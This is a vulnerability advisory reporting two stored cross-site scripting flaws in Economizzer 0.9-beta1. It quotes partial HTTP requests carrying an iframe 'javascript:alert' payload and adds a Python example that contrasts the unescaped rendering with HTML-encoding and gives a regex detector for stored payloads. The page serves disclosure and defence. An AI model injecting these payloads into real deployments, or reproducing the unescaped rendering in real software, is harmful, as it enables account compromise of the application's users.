Economizzer 0.9-beta1 Cross Site Scripting
A persistent cross-site scripting (XSS) vulnerability exists in gugoan's
Economizzer v.0.9-beta1. The application fails to properly sanitize
user-supplied input when creating a new cash book entry via the
*cashbook/create* endpoint. An attacker can inject malicious JavaScript
payloads that are permanently stored and later executed in the context of
any user who views the affected entry.



https://<host>/web/cashbook/create

POST /web/cashbook/create HTTP/2
Host: <host>
--snip--
------WebKitFormBoundaryM93AAtGLA59fTnSU
--snip--

<iframe src="javascript:alert(4)">
------WebKitFormBoundaryM93AAtGLA59fTnSU
Content-Disposition: form-data; name="Cashbook[is_pending]"

--snip--



------- second advisory --------

A persistent cross-site scripting (XSS) vulnerability exists in gugoan's
Economizzer v.0.9-beta1. The application fails to properly sanitize
user-supplied input when creating a new category via the
*category/create* endpoint.
An attacker can inject malicious JavaScript payloads that are permanently
stored and later executed in the context of any user who views the affected
entry.

https://<host>/web/category/create

POST /web/category/create HTTP/2
Host: <host>
--snip--

Category%5Bdesc_category%5D=%3Ciframe+src%3D%22javascript%3Aalert%283%29%22%3E
--snip--
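Added example, not part of the advisory or of the Economizzer code base: it decodes the category/create form body shown above, contrasts rendering the stored description unescaped (the flaw) with HTML-encoding it on output (the fix, which in a Yii2 view is what Html::encode() does), and gives an audit helper for flagging already-stored rows. The sample body and the row list are constructed from the payloads on this page; the function and field names are assumptions.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed sample: the url-encoded body of the category/create request
# quoted in this advisory (Yii2 attribute naming: Category[desc_category]).
SAMPLE_BODY = (
    "Category%5Bdesc_category%5D="
    "%3Ciframe+src%3D%22javascript%3Aalert%283%29%22%3E"
)

# Markup or URI schemes that can execute script once rendered in a browser.
ACTIVE_CONTENT = re.compile(
    r"<\s*(script|iframe|object|embed|svg)\b|javascript\s*:|\bon\w+\s*=", re.I
)


def parse_form_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into field -> value."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_vulnerable(desc: str) -> str:
    """Mimics the flaw: the stored description is interpolated into HTML as-is."""
    return f"<td>{desc}</td>"


def render_hardened(desc: str) -> str:
    """Fix: entity-encode on output so stored text can never become markup."""
    return f"<td>{html.escape(desc, quote=True)}</td>"


def looks_like_xss(value: str) -> bool:
    """Detection helper: True if a stored value contains script-capable content."""
    return ACTIVE_CONTENT.search(value) is not None


def audit_descriptions(rows) -> list:
    """Return ids of (id, description) rows that should be reviewed or re-encoded."""
    return [row_id for row_id, desc in rows if looks_like_xss(desc)]


if __name__ == "__main__":
    desc = parse_form_body(SAMPLE_BODY)["Category[desc_category]"]
    print("stored value:   ", desc)
    print("vulnerable html:", render_vulnerable(desc))
    print("hardened html:  ", render_hardened(desc))
    # Constructed rows: one benign, one carrying the advisory's payload.
    print("rows to review: ", audit_descriptions([(1, "Groceries"), (2, desc)]))
```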
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸